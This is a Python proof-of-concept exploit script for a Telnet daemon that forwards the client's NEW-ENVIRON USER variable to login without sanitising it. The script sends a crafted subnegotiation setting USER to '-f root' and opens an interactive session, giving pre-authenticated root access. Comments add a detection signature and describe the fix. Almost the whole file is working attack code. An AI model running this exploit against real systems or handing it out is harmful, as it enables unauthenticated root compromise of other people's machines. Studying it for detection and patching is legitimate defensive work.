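import telnetlib  # NOTE: deprecated since Python 3.11 and removed in 3.13 (PEP 594); pin an older interpreter
import sys
import time

# Proof of concept: targets a telnetd that forwards the client-supplied NEW-ENVIRON
# USER variable to login(1) without sanitising it, so a value beginning with "-"
# is parsed as a login option ("-f root" = pre-authenticated root login).
# Defender notes: the on-the-wire signature is an IAC SB NEW-ENVIRON IS ... VAR "USER"
# VALUE "-..." subnegotiation; a fixed telnetd rejects or escapes USER values that
# start with "-" (or does not pass USER to login at all), and Telnet should not be
# reachable from untrusted networks in the first place.

if len(sys.argv) < 2:
    # Fix: the original usage line omitted the mandatory <host> argument, which is
    # exactly the argument whose absence triggers this message.
    print(f"Usage: python3 {sys.argv[0]} <host> [port=23]")
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2]) if len(sys.argv) > 2 else 23

tn = telnetlib.Telnet(host, port)
print(f"[+] Connected to {host}:{port}")
try:
    # Basic Telnet negotiation to reach the environment-variable stage:
    # IAC WILL ECHO, IAC DO ECHO, IAC WILL SGA, IAC DO SGA (options 1 and 3).
    tn.sock.sendall(b"\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03")  # ECHO + SGA

    # Craft NEW-ENVIRON with USER=-f root
    # IAC SB NEW-ENVIRON IS VAR USER VALUE -f root IAC SE
    payload = (
        b"\xff\xfa\x27"  # IAC SB NEW-ENVIRON (option 39)
        b"\x01"          # IS
        b"\x00USER"      # VAR = USER
        b"\x01-f root"   # VALUE = -f root
        b"\xff\xf0"      # IAC SE
    )
    tn.sock.sendall(payload)
    print("[+] Sent malicious USER env var")

    time.sleep(1.5)  # Give server time to fork/exec login -f root
    print("[+] Interact (press Enter a few times if needed)...")
    tn.interact()  # Hands you the shell
finally:
    # Always release the socket, including when interact() is interrupted.
    tn.close()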